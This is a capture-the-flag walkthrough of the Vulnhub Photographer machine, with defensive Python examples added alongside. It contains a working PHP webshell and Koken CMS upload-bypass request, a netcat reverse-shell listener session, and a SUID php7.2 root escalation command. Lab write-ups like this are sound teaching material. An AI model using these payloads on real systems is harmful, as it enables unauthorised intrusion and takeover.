Photographer
Identifying the target host's IP address
sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:6c:43:60 1 60 PCS Systemtechnik GmbH
192.168.56.226 08:00:27:04:ce:ca 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.226.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.226 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 00:35 EDT
Nmap scan report for bogon (192.168.56.226)
Host is up (0.00017s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Koken API error
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:04:CE:CA (Oracle VirtualBox virtual NIC)
Service Info: Host: PHOTOGRAPHER
Host script results:
|_clock-skew: mean: 1h19m58s, deviation: 2h18m33s, median: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-03-22T04:35:31
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: photographer
| NetBIOS computer name: PHOTOGRAPHER\x00
| Domain name: \x00
| FQDN: photographer
|_ System time: 2023-03-22T00:35:31-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds
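The scan above already contains most of what a defender needs to act on: two Apache 2.4.18 instances, SMB on 139/445, and host scripts reporting that SMB signing is not enforced and that a guest session was accepted. The following is an added example (not part of the original post, and not an nmap or Koken tool) that parses nmap's normal (-oN) output and turns those lines into findings. The sample text is copied from the scan above; the version threshold defaults to the "at least Apache/2.4.37" figure that nikto reports later on this page.

```python
import re

# Constructed sample input: the port table and host-script section of the
# nmap -oN output above, with whitespace as it appears on the page.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Koken API error
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:04:CE:CA (Oracle VirtualBox virtual NIC)
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
|_ message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_normal(text):
    """Parse nmap -oN text into (ports, host_script_lines).

    ports: one dict per port line {port, proto, state, service, version, scripts},
           with the |_script lines below that port attached as key/value pairs.
    host_script_lines: bare text of every line under "Host script results:".
    """
    ports, host_lines = [], []
    in_host_section = False
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            in_host_section = True
            continue
        m = PORT_RE.match(line)
        if m and not in_host_section:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip(), "scripts": {}})
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ").strip()
            if in_host_section:
                host_lines.append(body)
            elif ports:
                key, sep, val = body.partition(":")
                if sep:
                    ports[-1]["scripts"][key.strip()] = val.strip()
    return ports, host_lines


def apache_version(version_field):
    """Return the Apache httpd version as an int tuple, or None if not Apache."""
    m = re.search(r"Apache httpd (\d+)\.(\d+)\.(\d+)", version_field)
    return tuple(int(x) for x in m.groups()) if m else None


def review(ports, host_lines, min_apache=(2, 4, 37)):
    """Turn parsed output into defender findings (plain strings)."""
    notes = []
    for p in ports:
        if p["state"] != "open":
            continue
        v = apache_version(p["version"])
        if v and v < min_apache:
            notes.append(f"{p['port']}/{p['proto']}: Apache httpd "
                         f"{'.'.join(map(str, v))} is older than "
                         f"{'.'.join(map(str, min_apache))}; patch or upgrade")
        if p["port"] in (139, 445):
            notes.append(f"{p['port']}/{p['proto']}: SMB exposed ({p['version']}); "
                         "restrict to trusted networks and disable SMB1 if unused")
    for line in host_lines:
        low = line.lower()
        if "signing" in low and ("not required" in low or "disabled" in low):
            notes.append(f"SMB: message signing not enforced ({line})")
        if low.startswith("account_used: guest"):
            notes.append("SMB: guest session accepted; review 'map to guest' "
                         "and share permissions")
    return notes


if __name__ == "__main__":
    parsed_ports, parsed_host = parse_nmap_normal(NMAP_OUTPUT)
    for note in review(parsed_ports, parsed_host):
        print(note)
```

Run against the sample it produces seven findings: two outdated Apache instances, two SMB exposures, two signing warnings (SMB1 and SMB2) and the guest-session note. For real use, feed it the file written by `-oN` instead of the embedded string.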
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ smbclient -L 192.168.56.226
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP PHOTOGRAPHER
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ smbclient //192.168.56.226/sambashare
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 20 21:30:07 2020
.. D 0 Tue Jul 21 05:44:25 2020
mailsent.txt N 503 Mon Jul 20 21:29:40 2020
wordpress.bkp.zip N 13930308 Mon Jul 20 21:22:23 2020
278627392 blocks of size 1024. 264268400 blocks available
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (14.9 KiloBytes/sec) (average 14.9 KiloBytes/sec)
smb: \> get wordpress.bkp.zip
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (42511.9 KiloBytes/sec) (average 38539.1 KiloBytes/sec)
smb: \> put test.txt
NT_STATUS_ACCESS_DENIED opening remote file \test.txt
smb: \> pwd
Current directory is \\192.168.56.226\sambashare\
smb: \> quit
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ ls
mailsent.txt nmap_full_scan test.txt wordpress.bkp.zip
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ enum4linux 192.168.56.226
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\daisa (Local User)
S-1-22-1-1001 Unix User\agi (Local User)
Two usernames identified: daisa, agi
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer/wordpress]
└─$ curl http://192.168.56.226/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.226 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer/wordpress]
└─$ curl http://192.168.56.226:8000/robots.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer/wordpress]
└─$ nikto -h http://192.168.56.226
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.226
+ Target Hostname: 192.168.56.226
+ Target Port: 80
+ Start Time: 2023-03-22 00:42:18 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 164f, size: 5aaf04d7cd1a0, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-03-22 00:43:24 (GMT-4) (66 seconds)
---------------------------------------------------------------------------
Analysing the page source served on port 8000 shows that the CMS is Koken, version 0.22.24.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ searchsploit Koken
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) | php/webapps/48706.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ searchsploit -m php/webapps/48706.txt
Exploit: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
URL: https://www.exploit-db.com/exploits/48706
Path: /usr/share/exploitdb/exploits/php/webapps/48706.txt
File Type: ASCII text
Copied to: /home/kali/Desktop/Vulnhub/Photographer/48706.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ cat 48706.txt
# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
# Date: 2020-07-15
# Exploit Author: v1n1v131r4
# Vendor Homepage: http://koken.me/
# Software Link: https://www.softaculous.com/apps/cms/Koken
# Version: 0.22.24
# Tested on: Linux
# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.md
The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.
Steps to exploit:
1. Create a malicious PHP file with this content:
<?php system($_GET['cmd']);?>
2. Save as "image.php.jpg"
3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.
4. On Burp, rename your file to "image.php"
POST /koken/api.php?/content HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target.com/koken/admin/
x-koken-auth: cookie
Content-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551
Content-Length: 1043
Connection: close
Cookie: PHPSESSID= [Cookie value here]
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="name"
image.php
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="chunk"
0
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="chunks"
1
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="upload_session_start"
1594831856
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="visibility"
public
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="license"
all
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="max_download"
none
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: image/jpeg
<?php system($_GET['cmd']);?>
-----------------------------2391361183188899229525551--
5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.
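The bypass described in the advisory works because the extension whitelist is checked against something the client controls and the file is then stored under a name the client also controls (the request carries a separate `name` field and a `filename` that are both "image.php"). The following is an added example, written for this page and not Koken's code or the advisory author's: `weak_accept` is a hypothetical model of that flawed pattern, and `hardened_accept` shows the server-side checks that close it, namely validating the name that will actually be stored, requiring exactly one extension, verifying the file's magic bytes, and generating the stored name on the server. The magic-byte table and all inputs are constructed for the example.

```python
import os
import secrets

# Extension -> magic bytes the stored file must begin with (constructed table).
ALLOWED_IMAGE_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_accept(selected_filename, requested_name):
    """Hypothetical model of the flawed pattern (not Koken's actual code): the
    whitelist is applied to the file name the browser selected, but the file is
    stored under a separate, client-controlled 'name' field."""
    ext = selected_filename.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_IMAGE_TYPES:
        return None
    return requested_name  # a proxy can turn "image.php.jpg" into "image.php" here


def hardened_accept(requested_name, data, max_bytes=10 * 1024 * 1024):
    """Validate on the server, on the name that will actually be stored and on the
    bytes themselves. Returns (accepted, detail); on success, detail is the
    server-generated file name."""
    if len(data) > max_bytes:
        return False, "file too large"
    base = os.path.basename(requested_name)
    if (base != requested_name or base.startswith(".")
            or "\x00" in base or "/" in base or "\\" in base):
        return False, "path components, hidden names and NUL bytes are not allowed"
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "name must be <stem>.<ext> with exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED_IMAGE_TYPES:
        return False, f"extension .{ext} is not allowed"
    if not any(data.startswith(sig) for sig in ALLOWED_IMAGE_TYPES[ext]):
        return False, "content does not look like the declared image type"
    if b"<?php" in data or b"<?=" in data:
        # Defence in depth: a valid JPEG can carry PHP in a comment segment.
        return False, "embedded script tag found"
    # The client never chooses the stored name: random stem + validated extension.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # constructed JPEG header
    print("weak   :", weak_accept("image.php.jpg", "image.php"))
    print("hardened image.php     :", hardened_accept("image.php", b"<?php phpinfo(); ?>"))
    print("hardened image.php.jpg :", hardened_accept("image.php.jpg", jpeg))
    print("hardened photo.jpg     :", hardened_accept("photo.jpg", jpeg))
```

The decisive control is the last line of `hardened_accept`: because the stored name is generated server-side from a validated extension, no request manipulation can produce a `.php` file on disk. Serving the upload directory with script execution disabled (or from outside the web root) is the matching web-server-side control.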
First, the admin directory has to be located; nikto reports it as /admin.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ nikto -h http://192.168.56.226:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.226
+ Target Hostname: 192.168.56.226
+ Target Port: 8000
+ Start Time: 2023-03-22 00:42:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-koken-cache' found, with contents: hit
+ All CGI directories 'found', use '-C none' to test none
+ Server may leak inodes via ETags, header found with file /, inode: 1264, size: 5f775c3bf55a0, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'x-xhr-current-location' found, with contents: http://192.168.56.226/
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /app/: This might be interesting...
+ OSVDB-3092: /home/: This might be interesting...
Next, an administrator account and password are needed.
The home page seen earlier showed daisa's name, so this should be the site that agi set up for daisa; the email should be [email protected], and the password is guessed to be babygirl.
Login succeeds; the file upload vulnerability is then exploited.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ mv shell.php shell.php.jpg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.226] 59056
Linux photographer 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
01:09:04 up 36 min, 0 users, load average: 1.01, 2.98, 4.43
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@photographer:/$ cd /home
cd /home
www-data@photographer:/home$ ls -alh
ls -alh
total 32K
drwxr-xr-x 5 root root 4.0K Jul 20 2020 .
drwxr-xr-x 24 root root 4.0K Feb 28 2019 ..
drwxr-xr-x 17 agi agi 4.0K Jul 21 2020 agi
drwxr-xr-x 16 daisa daisa 4.0K Jul 20 2020 daisa
drwx------ 2 root root 16K Feb 28 2019 lost+found
www-data@photographer:/home$ cd daisa
cd daisa
www-data@photographer:/home/daisa$ ls -alh
ls -alh
total 112K
drwxr-xr-x 16 daisa daisa 4.0K Jul 20 2020 .
drwxr-xr-x 5 root root 4.0K Jul 20 2020 ..
-rw------- 1 daisa daisa 966 Jul 20 2020 .ICEauthority
-rw------- 1 daisa daisa 52 Jul 20 2020 .Xauthority
-rw-r--r-- 1 daisa daisa 220 Feb 28 2019 .bash_logout
-rw-r--r-- 1 daisa daisa 3.7K Feb 28 2019 .bashrc
drwx------ 11 daisa daisa 4.0K Jul 20 2020 .cache
drwx------ 3 daisa daisa 4.0K Feb 28 2019 .compiz
drwx------ 14 daisa daisa 4.0K Jul 20 2020 .config
-rw-r--r-- 1 daisa daisa 25 Feb 28 2019 .dmrc
drwx------ 2 daisa daisa 4.0K Jul 20 2020 .gconf
drwx------ 3 daisa daisa 4.0K Jul 20 2020 .gnupg
drwx------ 3 daisa daisa 4.0K Feb 28 2019 .local
-rw-r--r-- 1 daisa daisa 655 Feb 28 2019 .profile
-rw-r--r-- 1 daisa daisa 0 Jul 20 2020 .sudo_as_admin_successful
-rw------- 1 daisa daisa 681 Jul 20 2020 .xsession-errors
-rw------- 1 daisa daisa 1.7K Jul 20 2020 .xsession-errors.old
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Desktop
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Documents
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Downloads
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Music
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Pictures
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Public
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Templates
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Videos
-rw-r--r-- 1 daisa daisa 8.8K Feb 28 2019 examples.desktop
-rwxrwxr-x 1 root root 33 Jul 20 2020 user.txt
www-data@photographer:/home/daisa$ cat user.txt
cat user.txt
d41d8cd98f00b204e9800998ecf8427e
Privilege escalation
www-data@photographer:/var/www/html/koken/admin$ find / -perm -4000 -type f 2>/dev/null
<www/html/koken/admin$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su
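The list above is exactly what a periodic SUID audit should be comparing against a known-good baseline: every entry is a stock Ubuntu helper except /usr/bin/php7.2, and an interpreter with the SUID bit set keeps root for whatever code it is asked to run. The following is an added example (not from the original post) that diffs `find / -perm -4000 -type f` output against a baseline and separately flags interpreter binaries. The find output is copied from the page; the baseline is constructed for the example, and in practice it should come from a clean reference image or package manifests rather than from the host being audited.

```python
import os

# Constructed sample: the `find / -perm -4000 -type f` output shown above.
SUID_FIND_OUTPUT = """\
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su
"""

# Constructed baseline for this example: the SUID files an administrator expects
# on the host. Generate the real one from a clean reference image, never from the
# machine being audited.
EXPECTED_SUID = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/xorg/Xorg.wrap",
    "/usr/lib/snapd/snap-confine",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/sbin/pppd",
    "/usr/bin/pkexec",
    "/usr/bin/passwd",
    "/usr/bin/newgrp",
    "/usr/bin/gpasswd",
    "/usr/bin/sudo",
    "/usr/bin/chsh",
    "/usr/bin/chfn",
    "/bin/ping",
    "/bin/fusermount",
    "/bin/mount",
    "/bin/ping6",
    "/bin/umount",
    "/bin/su",
}

# Interpreters must never be SUID: they keep the elevated uid for any code they run.
INTERPRETER_PREFIXES = ("php", "python", "perl", "ruby", "node", "lua")


def audit_suid(find_output, baseline):
    """Compare SUID files found on a host with the expected set.

    Returns a dict with: unexpected (present but not in baseline), missing
    (in baseline but absent), interpreters (any interpreter carrying SUID) and
    remediation (chmod commands to review before running).
    """
    found = {line.strip() for line in find_output.splitlines() if line.strip()}
    unexpected = sorted(found - baseline)
    missing = sorted(baseline - found)
    interpreters = sorted(p for p in found
                          if os.path.basename(p).startswith(INTERPRETER_PREFIXES))
    remediation = [f"chmod u-s {p}" for p in sorted(set(unexpected) | set(interpreters))]
    return {"unexpected": unexpected, "missing": missing,
            "interpreters": interpreters, "remediation": remediation}


if __name__ == "__main__":
    report = audit_suid(SUID_FIND_OUTPUT, EXPECTED_SUID)
    for key, value in report.items():
        print(f"{key}: {value}")
```

On this host the only unexpected entry and the only interpreter is /usr/bin/php7.2, so the single remediation line is `chmod u-s /usr/bin/php7.2`. Unexpected entries that turn out to be legitimate (a newly installed package, for instance) belong in the baseline, not in the chmod list, which is why the command list is returned for review rather than executed.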
Exploit the SUID bit on php7.2 to escalate privileges.
www-data@photographer:/tmp$ CMD="/bin/sh"
CMD="/bin/sh"
www-data@photographer:/tmp$ /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
< /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
cd /root
cd /root
ls -alh
ls -alh
# # total 44K
drwx------ 4 root root 4.0K Jul 21 2020 .
drwxr-xr-x 24 root root 4.0K Feb 28 2019 ..
-rw------- 1 root root 49 Jul 21 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwx------ 2 root root 4.0K Feb 26 2019 .cache
-rw------- 1 root root 216 Jul 20 2020 .mysql_history
drwxr-xr-x 2 root root 4.0K Jul 20 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 5.2K Jul 21 2020 .viminfo
-rw------- 1 root root 2.1K Jul 21 2020 proof.txt
# cat proof.txt
cat proof.txt
.:/://::::///:-`
-/++:+`:--:o: oo.-/+/:`
-++-.`o++s-y:/s: `sh:hy`:-/+:`
:o:``oyo/o`. ` ```/-so:+--+/`
-o:-`yh//. `./ys/-.o/
++.-ys/:/y- /s-:/+/:/o`
o/ :yo-:hNN .MNs./+o--s`
++ soh-/mMMN--.` `.-/MMMd-o:+ -s
.y /++:NMMMy-.`` ``-:hMMMmoss: +/
s- hMMMN` shyo+:. -/+syd+ :MMMMo h
h `MMMMMy./MMMMMd: +mMMMMN--dMMMMd s.
y `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm +-
h dMMMMd:```` `mmNh ```./NMMMMs o.
y. /MMMMNmmmmd/ `s-:o sdmmmmMMMMN. h`
:o sMMMMMMMMs. -hMMMMMMMM/ :o
s: `sMMMMMMMo - . `. . hMMMMMMN+ `y`
`s- +mMMMMMNhd+h/+h+dhMMMMMMd: `s-
`s: --.sNMMMMMMMMMMMMMMMMMMmo/. -s.
/o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o`
.++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o-
./+:`:yh:dso/.+-++++ss+h++.:++-
-/+/-:-/y+/d:yh-o:+--/+/:`
`-///////////////:`
Follow me at: http://v1n1v131r4.com
d41d8cd98f00b204e9800998ecf8427e
#
Root shell and root flag obtained.
Source: https://www.cnblogs.com/jason-huawen/p/17243383.html